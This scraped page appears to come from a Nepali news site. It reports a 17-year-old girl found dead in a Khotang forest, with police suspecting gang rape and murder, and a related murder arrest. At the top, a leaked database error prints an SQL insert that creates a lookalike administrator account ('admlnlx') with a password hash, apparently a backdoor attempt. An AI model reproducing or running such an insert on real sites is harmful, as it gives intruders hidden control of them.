WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcVrVbNbr/E//LaUaYom2eHEdxYrb3/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:10:39', '', 'admlnlx', 'admlnlx')
खोटाङ, माघ २७–
जिल्लाको दक्षिणी गाविस लिच्किराम्चे–८ की १७ वर्षीया रीता तामाङ मृत फेला परेकी छन् । मङ्गलबार रातिदेखि हराएकी रीताको खोजी गर्ने क्रममा सिम्पानी–७ स्थित जङ्गलमा बुधबार दिउँसो मृत फेला परेकी हुन् ।
सिम्पानी बजारको एक होटलमा काम गर्दै आएकी रीता बेलुकी आफ्नो घर नफर्किएपछि खोजी गर्दा मृत अवस्थामा भेटिएको आफन्तले बताएका छन् । सिम्पानीस्थित शिव खड्काको होटलमा काम गर्दै आएकी रीता बिहान काम गर्न होटल जाने र बेलुकी आफ्नो घर फर्कने गरेको उनका बुबा वीरबहादुर तामाङले जानकारी दिनुभयो ।
हराएकी रीताको खोजी गर्दा जङ्गल मडारिएको ठाउँ भेटिएको र उक्त ठाउँबाट करिब ४० मिटर तल उनलाई मृत भेटिएको जिल्ला प्रहरी कार्यालय खोटाङका प्रहरी नायब उपरीक्षक नवीनकिशोर प्रधानले बताउनुभयो । “घटनाको प्रकृति हेर्दा सामूहिक बलात्कारपछि उनको हत्या गरिएको हुनसक्ने अनुमान गरिएको छ”, उहाँले भन्नुभयो, “रहस्यमय घटना भएका कारण थप अनुसन्धान भइरहेको छ ।”
रीता एक महिनाअघि देखि मात्र सो होटलमा काम गर्दै आएकी बुबा वीरबहादुरले जानकारी दिनुभयो । मृतक युवतीको शव परीक्षणका लागि प्राथमिक स्वास्थ्य केन्द्र चिसापानी लगिएको प्रहरीले जनाएको छ ।
यसअघि गत शनिबार यौनसम्पर्क गर्न नमान्दा भोजपुरकी एक अविवाहित महिलाको हत्या गर्नमा संलग्न खोटाङका विवाहित पुरुष पक्राउ परेका छन् । भोजपुर नगरपालिका–७ कोदारकी ३० वर्षीया सुमिना महतको हत्या गरेर फाल्ने चिसापानी–४ का ४० वर्षीय रोहिन कार्की पक्राउ परेका हुन् । रासस